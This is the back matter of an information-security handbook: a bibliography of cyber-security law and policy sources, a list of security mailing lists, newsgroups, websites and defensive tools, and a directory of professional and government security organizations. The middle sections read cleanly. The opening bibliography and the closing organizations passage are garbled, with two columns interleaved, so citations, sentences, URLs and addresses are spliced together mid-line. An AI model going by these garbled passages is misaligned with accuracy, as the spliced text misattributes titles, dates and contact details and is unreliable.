legislation in WIPO Member States, available at http://www.wipo.org/about- Official Journal of the European Communities ­ Council ip/en/ipworldwide/index.html. Resolution on the Implementation of the eEurope 2005 Action Plan, February 18, 2003. From the text footnotes for Part 4: OECD Guidelines for the Security of Information Systems http://www.usdoj.gov/04foia/privstat.htm and Networks ­ Towards a Culture of Security. A more extensive, although dated, discussion of legal Privacy Amendment Act of Australia (Private Sector) - issues in the U.S. can be found in Computer Crime: A Act 2000 Crimefighter's Handbook (O'Reilly). The book is out of print, but used copies are available. Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 367 The Global Internet Policy Initiative has a host of and Conflict Research, Swiss Federal Institute of resources on the full range of policy issues affecting ICT Technology (2002) http://www.isn.ethz.ch/crn. development: http://www.internetpolicy.net. For descriptions of how various other countries have The National Strategy to Secure Cyberspace [United responded to critical infrastructure protection, see States], February 2003 International Critical Information Infrastructure http://www.whitehouse.gov/pcipb/ Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies Office of Critical Infrastructure Protection and and Conflict Research, Swiss Federal Institute of Emergency Preparedness (OCIPEP) Technology (2002): http://www.isn.ethz.ch/crn. http://www.ocipep.gc.ca/home/index_e.asp. For ANNEX descriptions of how various other countries have United States Presidential Decision Directive 63: Critical responded to critical infrastructure protection, see Infrastructure Protection, May 22, 1998 "International Critical Information Infrastructure http://www.fas.org/irp/offdocs/pdd-63.htm. 
See also Protection Handbook," edited by Andreas Wenger, Jan PDD 62: http://www.fas.org/irp/offdocs/pdd-62.htm. TW Metzger and Myriam Dunn, Center for Security Studies O and Conflict Research, Swiss Federal Institute of E.O. 13228, Establishing the Office of Homeland Security Technology (2002) http://www.isn.ethz.ch/crn. and the Homeland Security Council, October 8, 2001, http://fas.org/irp/offdocs/eo/eo-13228.htm; E.O. The U.K.'s Home Office has created a National 13231, Critical Infrastructure Protection in the Infrastructure Security Coordination Centre (NISCC) to Information Age, October 16, 2001: coordinate critical infrastructure protection issues, http://www.ciao.gov/News/EOonCriticalInfrastrutureProt provide alerts and attack response assistance, and ection101601.html. facilitate public-private relationships to protect infrastructure. Within NISCC, there is a Computer The National Strategy to Secure Cyberspace, Feb. 14, Emergency Response Team, known as UNIRAS. An 2003, http://www.dhs.gov/interweb/assetlibrary/ Electronic Attack Response Group (EARG) is also within National_Cyberspace_Strategy.pdf. NISCC to provide assistance to critical infrastructure organizations and government departments that suffer The National Strategy to Secure Cyberspace was an attack. UNIRAS will provide an early warning and supplemented by The National Strategy for the Physical alert service to all UK businesses. The NISCC website Protection of Critical Infrastructures and Key Assets, (http://www.niscc.gov.uk) provides detailed information released March 4, 2003, http://www.dhs.gov/interweb/ on the British government's approach. assetlibrary/Physical_Strategy.pdf. Both of these documents are implementing components of The Under Australian law, Executive Agencies are non- National Strategy for Homeland Security, issued by the statutory bodies established by the Governor-General White House on July 16, 2002. 
when a degree of independence within the governmental structure is needed and when the functions of the European Commission, Proposal for a Regulation of the agency require a government-wide approach. The head European Parliament and of the Council Establishing the of an Executive Agency is appointed by, and directly European Network and Information Security Agency, Feb. accountable to, a Minister, in this case the Minister for 11, 2003, COM(2003) 63 final, 2003/0032 (COD): Communications, Information Technology and the Arts. http://europa.eu.int/information_society/eeurope/actio See: http://www.noie.gov.au/Projects/confidence/ n_plan/safe/documents/nisa_en.pdf Protecting/nat_agenda.htm. Council resolution of 28 Jan. 2002; European International Critical Information Infrastructure Commission, Communication from the Commission to the Protection Handbook, edited by Andreas Wenger, Jan Council, the European Parliament, the European Economic Metzger and Myriam Dunn, Center for Security Studies And Social Committee and the Committee of the Regions 368 HANDBOOK BIBLIOGRAPHY - Network and Information Security: Proposal for a Security of Information Systems to the information European Policy Approach, June 6, 2001, COM (2001) security standards adopted by non-governmental 298 final, http://europa.eu.int/information_ standards bodies. See generally, Michael Nugent, It Can't society/eeurope/news_library/new_documents/ Happen Here, Wall Street Technology Association, Ticker, index_en.htm A Technology Magazine For Industry Profession (2003), http://www.wsta.org/publications/articles/ European Commission, Communication from the 0402_article03.html Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee Carol A. Siegel, Ty R. 
Sagalow, Paul Serritella, Cyber-Risk- on the Regions Creating a Safer Information Society by Management Technical and Insurance Controls for Improving the Security of Information Infrastructures Enterprise-Level Security, Security Management Practices, and Combating Computer-related Crime, Jan. 26, 2001, pg. 42, (September/October 2002). http://www.gsu.edu/ COM(20000) 890 final, http://europa.eu.int/ISPO/eif/ ~accrss/Security_and_Business_Risk.pdf. InternetPoliciesSite/Crime/CrimeCommEN.html NIST's Computer Security Resource Center (CSRC) Homeland Security Act, publishes information on a broad range of security http://www.whitehouse.gov/deptofhomeland/analysis/ topics, including cryptographic standards and applications, security testing, security research, system Federal Information Security Management Act, Title III certification and accreditation guidelines, return on of E-Government Act of 2002, Pub. Law 107-347, security investments, small business computer security, http://csrc.nist.gov/policies/FISMA-final.pdf. and federal agency security practices. http://csrc.nist.gov/. NIST publications are available at Federal Information Security Management Act, Title III http://csrc.nist.gov/publications/index.html. of E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA-final.pdf. National Security Agency, Security Recommendation Guides, http://nsa1.www.conxion.com/. Thomas J. Smedinghoff, "The Developing U.S. Legal Standard for Cyber-security," Baker & McKenzie, Chicago, CERT/Coordination Center, Software Engineering http://www.bmck.com/ecommerce/us%20cyber- Institute, Carnegie Mellon University, security%20standards.pdf; http://www.cert.org/. 
In the United States, the Securities and Exchange European Commission, Communication from the Commission has brought actions against corporations Commission to the Council, the European Parliament, the that insufficiently protected their computer systems European Economic And Social Committee and the from unauthorized access. See SEC v. National Business Committee of the Regions - Network and Information Communications Corp., SEC Litig. Release No. 11223, Security: Proposal for a European Policy Approach, June Sept. 19, 1986, SEC Litig. Release No. 11229, Sept. 26, 6, 2001, COM(2001) 298 final, 1986. In the Matter of Material Sciences Corporation, SEC http://europa.eu.int/information_society/eeurope/news Litig. Release No. 41930, Sept. 28, 1999. _library/new_documents/index_en.htm. Sarbanes-Oxley Act of 2002, Pub. Law 107-204. Proposal for a Regulation of the European Parliament and of the Council Establishing the European Network and http://www.aicps.org; http://www.isaca.org. Information Security Agency, Commission of the European Communities, Feb. 11, 2003, COM(2003) 63 As is made clear throughout this handbook, there is a final, 2003/0032 (COD), http://europa.eu.int/ growing body widely accepted computer security information_society/eeurope/action_plan/safe/ standards, ranging from the Organization for Economic documents/nisa_en.pdf. Cooperation and Development (OECD) Guidelines for the Information Technology Security Handbook HANDBOOK BIBLIOGRAPHY 369 "Protecting Developing Economies from Cyber Attack ­ cybercrime and cyber-security area. Effective measures to Assistance to Build Regional Cyber-security prevent and control computer-related crime, Preparedness," APEC Media Release, Mar. 18, 2003, E/CN.15/2002/8, Report of the Secretary-General, http://www.apecsec.org.sg/whatsnew/press/PressRel_Pr United Nations, Economic and Social Council, otectgFromCyberAttack_180303.html. Commission on Crime Prevention and Criminal Justice, Eleventh Session, Vienna, Apr. 
ANNEX 3. ELECTRONIC RESOURCES

There is a certain irony in trying to include a comprehensive list of electronic resources in a printed document. Electronic resources such as Web pages, newsgroups, and mailing lists are updated on an hourly basis; new releases of computer programs can be published every few weeks.

We thus present the following electronic resources with the understanding that this list necessarily cannot be complete nor completely up to date. What we hope, instead, is that it is useful. By reading it, we hope that you will gain insight into places to look for future developments in computer security. Along the way, you may find some information you can put to immediate use.

Mailing Lists

There are many mailing lists that cover security-related material. We describe a few of the major ones here. However, this is not to imply that only these lists are worthy of mention! There may well be other lists of which we are unaware, and many of the lesser-known lists often have a higher volume of good information.

Never place blind faith in anything you read in a mailing list, especially if the list is unmoderated. There are a number of self-styled experts on the net who will not hesitate to volunteer their views, whether knowledgeable or not. Usually their advice is benign, but sometimes it is quite dangerous. There may also be people who are providing bad advice on purpose, as a form of vandalism. And certainly there are times when the real experts make a mistake or two in what they recommend in an off-hand note posted to the net.

There are some real experts on these lists who are (happily) willing to share their knowledge with the community, and their contributions make the Internet a better place. However, keep in mind that simply because you read it on the network does not mean that the information is correct for your system or environment, does not mean that it has been carefully thought out, does not mean that it matches your site policy, and most certainly does not mean that it will help your security. Always evaluate carefully the information you receive before acting on it.

A Big Problem With Mailing Lists

The problem with all these lists is that you can easily overwhelm yourself. If you are on lists from two response teams, four vendors, and another half-dozen general-purpose lists, you may find yourself filtering several hundred messages a day whenever a new general vulnerability is discovered. At the same time, you don't want to unsubscribe from these lists, because you might then miss the timely announcement of a special-case fix for your own systems.

One method that we have seen others use with some success is to split the mailing lists up among a group of administrators. Each person gets one or two lists to monitor, with particularly useful messages then redistributed to the entire group. Be certain to arrange coverage of these lists if someone leaves or goes on vacation, however!

Another approach is to feed these messages into Usenet newsgroups you create locally especially for this purpose. This strategy allows you to read the messages using an advanced newsreader that will allow you to kill message chains or trigger on keywords. It may also help provide an archiving mechanism to allow you to keep several days or weeks (or more) of the messages.

Finally, most security mailing lists offer the option of subscribing to a daily digest of the list. Digest subscribers usually receive a single message each day that contains all of the day's messages. Managing these digests can be easier than sorting through each individual message as it arrives. Of course, you may then learn about new vulnerabilities several hours later than other system administrators, or attackers.

Response Teams and Vendors

Many of the incident response teams (listed in Appendix E) have mailing lists for their advisories and alerts. If you can be classified as one of their constituents, you should contact the appropriate team(s) to be placed on their mailing lists.

Many vendors also have mailing lists for updates and advisories concerning their products. These include computer vendors, firewall vendors, and vendors of security software (including some freeware and shareware products). You may wish to contact your vendors to see if they have such lists, and if so, join. To subscribe to Microsoft's Security Notification Service mailing list, for example, visit the Microsoft Profile Center at http://register.microsoft.com/regsys/pic.asp and register.

Major Mailing Lists

These are some of the major mailing lists.

Bugtraq

Bugtraq is a full-disclosure computer security mailing list. This list features detailed discussion of UNIX security holes: what they are, how to exploit them, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities (although that is known to be the intent of some of the subscribers). It is, instead, about defining, recognizing, and preventing use of security holes and risks. To subscribe, sign up at http://www.securityfocus.com. Note that we have seen some incredibly incorrect and downright bad advice posted to this list. Individuals who attempt to point out errors or corrections are often roundly flamed as being "anti-disclosure." Post to this list with caution if you are the timid sort.

SecurityFocus also runs several other mailing lists that cover areas of security (such as IDS, honeypots, or viruses) or specific flavors of Unix (such as Linux or Sun systems). A particularly interesting list is "incidents", which is for reporting actual attacks and break-ins. SecurityFocus is owned by the Symantec Corporation.

NTBugtraq

A full-disclosure computer security mailing list for Microsoft Windows NT-based systems (including Windows 2000 and XP). Non-NT-based releases are off-topic for this list. In other ways, it resembles the Bugtraq list. Subscribe at http://www.ntbugtraq.com.

CERT-advisory

New CERT/CC advisories of security flaws and fixes for Internet systems are posted to this list. This list makes somewhat boring reading; often the advisories are so watered down that you cannot easily figure out what is actually being described. Nevertheless, the list does have its bright spots. Send subscription requests to majordomo@cert.org. Put "subscribe cert-advisory" in the message body.

Archived past advisories are available at http://www.cert.org/nav/alerts.html.

Computer underground digest

A curious mixture of postings on privacy, security, law, and the computer underground fill this list. Despite the name, this list was not a digest of material by the "underground"; it contained information about the computing milieu. Unfortunately, it stopped publishing in 2000, and it is unclear if the list will ever resume. This list was available as the newsgroup comp.society.cu-digest on the Usenet; the newsgroup was the preferred means of distribution. The list is archived at numerous places around the Internet, including its home page: http://sun.soci.niu.edu/~cudigest/

Firewalls

The Firewalls mailing list, which is hosted by the Internet Software Consortium, is a primary forum for folks on the Internet who want to discuss the design, construction, operation, maintenance, and philosophy of Internet firewall security systems. To subscribe, visit http://www.isc.org/services/public/lists/firewalls.html.

The Firewalls mailing list is usually high volume (sometimes more than 100 messages per day, although usually it is only several dozen per day). To accommodate subscribers who don't want their mailboxes flooded with lots of separate messages from Firewalls, a digested version of the list is also available, and the list is archived on the web site.

Firewall-Wizards

The firewall-wizards mailing list is a moderated list focused not only on the design and implementation of firewalls but also on other network security topics. You can subscribe (or browse the archives) at http://honor.icsalabs.com/mailman/listinfo/firewall-wizards.

RISKS

RISKS is officially known as the ACM Forum on Risks to the Public in the Use of Computers and Related Systems. It's a moderated forum for discussion of risks to society from computers and computerization. RISKS is also distributed as the comp.risks Usenet newsgroup, and this is the preferred method of subscription. If you don't get Usenet (and don't want to read it via http://groups.google.com), you can send email subscription requests to RISKS-Request@csl.sri.com with the word "subscribe" in the body. Back issues are available through Google (as above) or from http://www.risks.org

SANS Security Alert Consensus

Security Alert Consensus is a weekly digest of alerts and announcements from several other security mailing lists and vendors. Subscriptions can be customized to include only those operating systems for which you are responsible. Subscribe at http://www.sans.org.

Usenet Groups

There are several Usenet newsgroups that you might find to be interesting sources of information on network security and related topics. However, the unmoderated groups are the same as other unmoderated groups on the Usenet: repositories of material that is often off-topic, repetitive, and incorrect. Our warning about material found in mailing lists, expressed earlier, applies doubly to newsgroups.

comp.security.announce (moderated): computer security announcements, including new CERT/CC advisories
comp.security.unix: UNIX security
comp.security.misc: miscellaneous computer and network security
comp.security.firewalls: information about firewalls
comp.virus (moderated): information on computer viruses and related topics
comp.admin.policy: computer administrative policy issues, including security
comp.protocols.tcp-ip: TCP/IP internals, including security
comp.unix.admin: UNIX system administration, including security
sci.crypt: discussions about cryptology research and application
sci.crypt.research (moderated): discussions about cryptology research
comp.risks (moderated): as described above
microsoft.public.security, microsoft.public.win2000.security, microsoft.public.windowsxp.security_admin: Microsoft hosts dozens of Usenet groups for its operating systems and applications, including several devoted specifically to security.

WWW Sites

There are literally thousands of WWW pages with pointers to other information. Some pages are comprehensive, and others are fairly narrow in focus. The ones we list here provide a good starting point for any browsing you might do. You will find most of the other useful directories linked into one or more of these pages, and you can then build your own set of "bookmarks."

CIAC

The staff of the CIAC keep a good archive of tools and documents available on their site. This archive includes copies of their notes and advisories, and some locally developed software: http://ciac.llnl.gov

CERIAS

CERIAS (Center for Education and Research in Information Assurance and Security), the successor to COAST (Computer Operations, Audit, and Security Technology), is an interdisciplinary center in information security research and education at Purdue University. It functions with close ties to researchers and engineers in major companies and government agencies. CERIAS focuses on real-world research needs and limitations.

From a purely historical perspective, this represents what may be the oldest and longest-running Internet archive of security tools and reference materials. Created in 1989 as an ftp-only site, the archive started as a collection of anti-virus tools and gradually expanded to include scanners, firewalls, and documents of all kinds. The site transitioned through gopher and WWW servers, and from a personal archive (Spafford's) to the COAST Laboratory archive, to the current CERIAS archive. For its first decade the site was generally believed to be the largest archive of security material on the Internet.

Over the last few years, the archive and hotlist have diverged somewhat, and fewer items are currently stored there than before. (Many of the commercial sites have resources to pay a staff to maintain more comprehensive archives.) Nonetheless, the current archive contains many items of historical interest, a large collection of useful tools and documents, including items not carried elsewhere, and items that are produced by CERIAS and CERIAS partners. There are also extensive lists of pointers to organizations and resources.
http://www.cerias.purdue.edu/infosec/
ftp://ftp.cerias.purdue.edu

FIRST

The FIRST (Forum of Incident Response and Security Teams) Secretariat maintains a large archive of material, including pointers to WWW pages for other FIRST teams: http://www.first.org

NIST CSRC

The National Institute of Standards and Technology's Computer Security Division maintains a comprehensive archive of documents and tools. This is a trusted, useful site for documentation, standards, and software. http://csrc.nist.gov/index.html

Insecure.org

Home of the nmap port-scanning tool, the Insecure.org web site links to archives of many important mailing lists and other security information: http://www.insecure.org

NIH

The WWW index page at NIH provides a large set of pointers to internal collections and other archives: http://www.alw.nih.gov/Security/

Software Resources

This section describes some of the tools and packages available on the Internet that you might find useful in maintaining security at your site. Although this software is (or was) freely available, some of it is restricted in various ways by the authors (e.g., it may not be permitted to be used for commercial purposes or be included on a CD-ROM, etc.) or by the U.S. government (e.g., if it contains cryptography, there may be constraints on export or use in certain locales). Carefully read the documentation files that are distributed with the packages. If you have any doubt about appropriate use restrictions, contact the author(s) directly.

Although we have used most of the software listed here, we can't take responsibility for ensuring that the copy you get will work properly and won't cause any damage to your system. As with any software, test it before you use it!

Some software distributions carry an external PGP signature. This signature helps you verify that the distribution you receive is the one packaged by the author. It does not provide any guarantee about the safety or correctness of the software, however. Because of the additional confidence that a digital signature can add to software distributed over the Internet, we strongly encourage authors to take the additional step of including a stand-alone signature. We also encourage users who download software to check several other sources if they download a package without a signature.

Crossplatform Tools

Kerberos

Kerberos is a secure network authentication system that is based upon secret-key (symmetric) cryptography. The Kerberos source code and papers are available from the Massachusetts Institute of Technology. Contact:
MIT Software Center
W32-300
20 Carlton Street
Cambridge, MA 02139
(617) 253-7686

You can use anonymous FTP to transfer files over the Internet from: ftp://athena-dist.mit.edu/pub/kerberos

Kerberos is integrated into Microsoft Windows 2000 and later releases.

nmap

nmap is the port scanner of choice for both attackers and defenders. It can perform a wide variety of TCP, UDP, and ICMP scans (including various "stealth scans" that attackers might use to disguise their activities), and has a sophisticated ability to "fingerprint" operating systems and determine their vendor and version remotely. It is available from: http://www.insecure.org

OpenSSH

OpenSSH is a free software implementation of the Secure Shell protocol (versions 1 and 2) for cryptographically secured remote terminal emulation, command execution, and file transfer. It is developed and maintained by the OpenBSD project, but the "portable" version compiles and runs on most Unix systems and several other operating systems. There are also several good free software SSH clients for Windows, including PuTTY. Disable the telnet daemon before you connect your system to a network; install OpenSSH (or another SSH server) if you need to be able to connect to your system over the network. You can get OpenSSH at: http://www.openssh.org

OpenSSL

OpenSSL is a free software implementation of the Secure Sockets Layer (versions 2 and 3) and Transport Layer Security (version 1) protocols. It provides libraries for these protocols that are commonly required by other server software (such as web servers). It also provides a command line tool for generating cryptographic certificate requests, certificates, signatures, and random numbers. OpenSSL is available from: http://www.openssl.org

Snort

Snort is a powerful open source packet sniffer and network intrusion detection system. Its IDS ruleset is regularly updated, enabling it to parse the TCP/IP packets that it monitors in real time and report suspicious traffic. Get Snort from: http://www.snort.org

Tripwire

Tripwire, written by Gene H. Kim and Gene Spafford of Purdue University, is a file integrity checker, a utility that compares a designated set of files and directories against information stored in a previously generated database. Added or deleted files are flagged and reported, as are any files that have changed from their previously recorded state in the database. Run Tripwire against system files on a regular basis. If you do so, the program will spot any file changes when it next runs, giving system administrators information to enact damage-control measures immediately. You can get the freeware version of Tripwire from: http://www.tripwire.com/downloads/

Unix Tools

chrootuid

The chrootuid daemon, by Wietse Venema, simplifies the task of running a network service at a low privilege level and with restricted file system access. The program can be used to run WWW and other network daemons in a minimal environment: the daemons have access only to their own directory tree and run with an unprivileged user ID. This arrangement greatly reduces the impact of possible security problems in daemon software. You can get chrootuid from:
ftp://ftp.porcupine.org/pub/security/index.html
ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysutils/chrootuid/

portmap

The portmap daemon, written by Wietse Venema, is a replacement program for Sun Microsystems' portmapper program. Venema's portmap daemon offers access control and logging features that are not found in Sun's version of the program. It also comes with the source code, allowing you to inspect the code for problems or modify it with your own additional features, if necessary. You can get portmap from:
ftp://ftp.porcupine.org/pub/security/index.html
ftp://ftp.cerias.purdue.edu/pub/tools/unix/netutils/portmap/

Portsentry

The portsentry program is a proactive defense against portscans that may precede an attack. portsentry listens on unused TCP/IP ports and takes action when outsiders attempt to establish connections to one or more monitored ports. Actions can include adding the scanning host to /etc/hosts.deny, adding the scanning host to a packet-filtering firewall, or running other arbitrary commands. portsentry is available at: http://sourceforge.net/projects/sentrytools/

Swatch

Swatch, by Todd Atkins of Stanford University, is the Simple Watcher. It monitors log files created by syslog, and allows an administrator to take specific actions (such as sending an email warning, paging someone, etc.) in response to logged events and patterns of events. You can get Swatch from:
http://www.oit.ucsb.edu/~eta/swatch/
ftp://ftp.cerias.purdue.edu/pub/tools/unix/logutils/swatch

tcpwrapper

The tcpwrapper is a system written by Wietse Venema that allows you to monitor and filter incoming requests for servers started by inetd. You can use it to selectively deny access to your sites from other hosts on the Internet, or, alternatively, to selectively allow access. You can get tcpwrapper from:
ftp://ftp.porcupine.org/pub/security/index.html
ftp://ftp.cerias.purdue.edu/pub/tools/unix/netutils/tcp_wrappers/

Tiger

Tiger, originally written by Doug Schales of Texas A&M University (TAMU), is a set of scripts that scan a UNIX system looking for security problems. Tiger was originally developed to provide a check of the UNIX systems on the A&M campus that users wanted to be able to access off-campus. Before the packet filtering in the firewall would be modified to allow off-campus access to the system, the system had to pass the Tiger checks. Tiger was dormant from 1994 to 1999, but is once again being actively maintained and updated. You can get Tiger from: http://www.tigersecurity.org

trimlog

David Curry's trimlog is designed to help you manage log files. It reads a configuration file to determine which files to trim, how to trim them, how much they should be trimmed, and so on. The program helps keep your logs from growing until they consume all available disk space. You can get trimlog from: ftp://ftp.cerias.purdue.edu/pub/tools/unix/logutils/trimlog/

wuarchive ftpd

The wuarchive FTP daemon offers many features and security enhancements, such as per-directory message files shown to any user who enters the directory, limits on the number of simultaneous users, and improved logging and access control. These enhancements are specifically designed to support anonymous FTP. You can get the daemon from: http://www.wu-ftpd.org

Windows Tools

Antivirus software

There are many fine antivirus products produced by companies that regularly issue updated virus lists. It is less important which antivirus product you choose than that you choose one, and use it consistently. The best products offer real-time antivirus protection as a background service, rather than just virus scanning on demand.

Microsoft Baseline Security Analyzer

The Microsoft Baseline Security Analyzer (MBSA) is a security-checking application for Windows NT 4 and later systems. It performs a variety of checks on the local system or on remote systems under your administrative control, including checking for updated security patches, password quality, filesystem configuration, auditing, and application-specific checks for IIS and SQL Server. Highly recommended as the first test to run: if a system cannot pass this, you have problems. Get it from: http://www.microsoft.com/technet/security/tools/Tools/mbsahome.asp

Microsoft IIS Lockdown Wizard

IIS, the Windows web server, has repeatedly been the source of system compromises. If you don't choose to replace it completely with Apache (http://httpd.apache.org) or another web server, at minimum you should run this Wizard, which disables unnecessary components and tightens security of the IIS installation and configuration. Get it from: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=43955

ANNEX 4. ORGANIZATIONS

Here we have collected information on a few useful organizations you can contact for more information and additional assistance.

Professional Organizations

You may find the following organizations helpful. The first few provide newsletters, training, and conferences. FIRST organizations may be able to provide assistance in an emergency.

Association for Computing Machinery (ACM)

The Association for Computing Machinery is the oldest of the computer science professional organizations. It publishes many scholarly journals and annually sponsors dozens of research and community-oriented conferences and workshops. The ACM also is involved with issues of education, professional development, and scientific progress. It has a number of special interest groups (SIGs) that are concerned with security and computer use. These include the SIG on Security, Audit and Control; the SIG on Operating Systems; the SIG on Computers and Society; and the SIG on Software Engineering. The ACM may be contacted at:
ACM Headquarters
One Astor Plaza
1515 Broadway, 17th Floor
New York, New York 10036-5701
+1-212-869-7440

ACM has a US Public Policy Committee that comments on pending legislation affecting security, privacy, and usability. Many of the items they are concerned with should also be of concern to those interested in security. http://www.acm.org/usacm/

The ACM has an extensive set of electronic resources, including information on its conferences and special interest groups. The information provided through the World Wide Web page is especially comprehensive and well organized: http://www.acm.org

American Society for Industrial Security (ASIS)

The American Society for Industrial Security is a professional organization for those working in the security field. ASIS has been in existence for 40 years and has 32,000 members worldwide as of 2002. Its 25 standing committees focus on particular areas of security, including computer security. The group publishes a monthly magazine devoted to security and loss management. ASIS also sponsors meetings and other group activities. Membership is open only to individuals involved with security at a management level.

More information may be obtained from http://www.asisonline.org or:
American Society for Industrial Security
1625 Prince Street
Alexandria, Virginia 22314-2818
+1-703-519-6200

Center for Internet Security (www.cisecurity.org)

The Center for Internet Security is a useful source of security information, checklists, and tools for Unix and Windows.

Computer Security Institute (CSI)

The Computer Security Institute was established in 1974 as a multiservice organization dedicated to helping its members safeguard their electronic data processing resources. CSI sponsors workshops and conferences on security, publishes a research journal and a newsletter devoted to computer security, and serves as a clearinghouse for security information. The Institute offers many other services to members and the community on a for-profit basis. Of particular use is an annual Computer Security Buyer's Guide that lists sources of software, literature, and security consulting. You may contact CSI at http://www.gocsi.com or:
Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
+1-415-947-6320

Electronic Frontier Foundation (EFF)

EFF advocates and litigates on issues related to civil liberties and freedom on the Internet. Although its concerns are considerably broader than security, EFF maintains an interesting archive of privacy- and security-related documents at http://www.eff.org/Privacy. EFF can be contacted through that web site, or:
Electronic Frontier Foundation
454 Shotwell Street
San Francisco, CA 94110-1914
+1-415-436-9333

Electronic Privacy Information Center (EPIC)

EPIC is a public interest research center that studies electronic privacy issues. EPIC litigates and advocates for privacy and civil liberties. EPIC's web site is http://www.epic.org, or it can be contacted at:
1718 Connecticut Avenue, NW, Suite 200
Washington, DC 20009
+1-202-483-1140
Email: info@epic.org

High Technology Crimes Investigation Association (HTCIA)

The HTCIA is a professional organization for individuals involved with the investigation and prosecution of high-technology crime, including computer crime. There are chapters throughout the U.S., and in many other countries. Information is available via the WWW page or through regular mail or phone:
http://htcia.org
HTCIA, Inc.
1474 Freeman Dr.
Amissville, VA 20106
+1 540-937-5019

Information Systems Security Association (ISSA)

The ISSA is an international organization of information security professionals and practitioners. It provides education forums, publications, and peer interaction opportunities that enhance the knowledge, skill, and professional growth of its members. They publish a magazine and sponsor conferences and workshops. Chapters are present throughout the U.S. and around the world.

For more information about ISSA, contact:
ISSA Headquarters
7044 S. 13th Street
Oak Creek, WI 53154
+1-414-768-8000
+1-800-370-ISSA

ISSA has a WWW page at: http://www.issa.org

Information Systems Audit and Control Association (ISACA)

The ISACA is an international organization of information security management, audit and consulting professionals and practitioners. It provides education forums, publications, professional certification and peer interaction opportunities that enhance the knowledge, skill, and professional growth of its members. They publish a magazine and sponsor research, conferences and workshops. Chapters are present throughout the U.S. and around the world.

For more information about ISACA, contact:
ISACA Headquarters
3701 Algonquin Road, Suite 1010
Rolling Meadows, Illinois 60008, USA
+1-847-253-1545
+1-847-253-1443

ISACA has a WWW page at: http://www.isaca.org

International Information Systems Security Certification Consortium, Inc.

The (ISC)2 is an international organization that supervises the CISSP and SSCP professional certifications. The Certified Information Systems Security Professional and Systems Security Certified Practitioner designations are widely accepted as standard levels of certification of those working in security. The organization requires certificants to subscribe to a professional code of conduct and to undergo continuing education after passing the initial tests.

More information can be found on the WWW site or via mail.
http://www.isc2.org

(ISC)2 Services
P.O. Box 1117
Dunedin, FL 34697
USA
+1.888.333.4458

(ISC)2 Europe Operations
Nestor House
London UK EC4V 5EX
+44 (0) 20 7779 8030

(ISC)2 Asia Operations
17/F., Printing House
Central
Hong Kong
+852 2111 6612

The Internet Society

The Internet Society sponsors many activities and events related to the Internet, including an annual symposium on network security. For more information, contact the Internet Society: http://www.isoc.org

You may also contact the Society's US or European headquarters:
1775 Wiehle Ave., Suite 102
Reston, VA 20190-5108
+1-703-326-9880

4, rue des Falaises
CH-1205 Geneva
Switzerland
+41-22-807-1444
Email: info@isoc.org

IEEE Computer Society

With nearly 100,000 members, the Computer Society is the largest member society of the Institute of Electrical and Electronics Engineers (IEEE). It too is involved with scholarly publications, conferences and workshops, professional education, technical standards, and other activities designed to promote the theory and practice of computer science and engineering. The IEEE-CS also has special interest groups, including a Technical Committee on Security and Privacy, a Technical Committee on Operating Systems, and a Technical Committee on Software Engineering. More information on the Computer Society may be obtained from:
IEEE Computer Society
1730 Massachusetts Avenue N.W.
Washington, DC 20036-1992
+1-202-371-0101

The Computer Society has a set of WWW pages starting at: http://www.computer.org

The Computer Society's Technical Committee on Security and Privacy has a number of resources, including an online newsletter: http://www.ieee-security.org/

IFIP Technical Committee 11

The International Federation for Information Processing, Technical Committee 11, is devoted to research, education, and communication about information systems security. The working groups of the committee sponsor various activities, including conferences, throughout the world. More information may be obtained from: http://www.ifip.org (Follow the links for security or for TC 11.)

Systems Administration and Network Security (SANS)

SANS conducts workshops and conferences around the U.S. to provide continuing education in various aspects of system administration and security. This includes training in intrusion detection, firewalls, and general security. The organization also provides various on-line newsletters and alerts, plus some self-paced instruction. More information can be found on their WWW site. http://www.sans.org

USENIX/SAGE

The USENIX Association is a nonprofit education organization for users of UNIX and UNIX-like systems. The Association publishes a magazine, sponsors numerous conferences, and has representatives on international standards bodies. The Association sponsors an annual workshop on UNIX security and another on systems administration, plus many conferences with security-related information. SAGE stands for the Systems Administrators Guild.

U.S. Government Organizations

National Institute of Standards and Technology (NIST)

The National Institute of Standards and Technology (formerly the National Bureau of Standards) has been charged with the development of computer security standards and evaluation methods for applications not involving the Department of Defense (DoD). Its efforts include research as well as developing standards. More information on NIST's activities can be obtained by contacting:
NIST Computer Security Division
100 Bureau Drive
Mail Stop 8930
Gaithersburg, MD 20899-8930
+1-301-975-2934
http://www.nist.gov
It is a NIST operates the Computer Security Resource Center: special technical group of the USENIX Association. To http://csrc.nist.gov/ join SAGE, you must also be a member of USENIX. Information on USENIX and SAGE can be obtained from: National Security Agency (NSA) USENIX Association The NSA maintains lists of evaluated and certified 2560 Ninth Street products, as well as technical information about Suite 215 security, especially cryptography. Linux users may be Berkeley, CA 94710 interested in the NSA Secure Linux program, a set of +1-510-528-8649 kernel patches that enhances Linux security. NSA also ANNEX office@usenix.org operates the National Cryptologic Museum in Maryland, and has an online museum of cryptology. The NSA web The USENIX WWW page is at: site is http://www.nsa.gov. FOUR http://www.usenix.org Also available from the site are a number of helpful configuration guides for common operating systems and routers. These guides provide helpful tips on changing default configurations to support better security and control. 382 ORGANIZATIONS Emergency Response Organizations U.S. Secret Service (USSS) The Department of Justice, FBI, and U.S. Secret Service Financial Crimes Division organizations listed below investigate violations of the Electronic Crime Branch federal laws related to fraud, theft, and the misuse of U.S. Secret Service computer resources. The various response teams that Washington, DC 20223 comprise the Forum of Incident and Response Security Voice: +1-202-435-7700 Teams (FIRST) do not investigate computer crimes per http://www.ustreas.gov/usss/financial_crimes.shtml se, but provide assistance when security incidents occur; they also provide research, information, and support that Forum of Incident and Response Security Teams can often help those incidents from occurring or spreading. 
